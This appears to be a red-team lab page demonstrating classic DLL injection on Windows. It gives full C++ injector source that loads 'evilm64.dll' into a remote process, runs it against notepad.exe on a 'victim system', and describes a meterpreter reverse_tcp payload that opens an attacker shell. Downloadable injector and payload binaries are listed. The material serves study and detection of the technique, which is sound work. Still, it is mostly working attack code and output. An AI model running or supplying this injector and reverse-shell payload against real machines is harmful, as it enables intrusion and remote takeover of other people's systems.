Powered By GitBook
DLL Injection
Injecting DLL into a remote process.
This lab attempts a classic DLL injection into a remote process.

Execution

inject-dll.cpp
1
int main(int argc, char *argv[]) {
2
HANDLE processHandle;
3
PVOID remoteBuffer;
4
wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
5
6
printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
7
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
8
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
9
WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
10
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
11
CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
12
CloseHandle(processHandle);
13
14
return 0;
15
}
Copied!
Compiling the above code and executing it with a supplied argument of 4892 which is a PID of the notepad.exe process on the victim system:
1
PS C:\experiments\inject1\x64\Debug> .\inject1.exe 4892
2
Injecting DLL to PID: 4892
Copied!
After the DLL is successfully injected, the attacker receives a meterpreter session from the injected process and its privileges:
inject1.exe
60KB
Binary
DLL injector.exe
evilm64.dll
5KB
Binary
c:\experiments\evilm64.dll (windows/x64/meterpreter/reverse_tcp)

Observations

Note how the notepad spawned rundll32 which then spawned a cmd.exe because of the meterpreter payload (and attacker's shell command) that got executed as part of the injected evilm64.dll into the notepad process:

References

https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
msdn.microsoft.com
https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx
msdn.microsoft.com
Last modified 2yr ago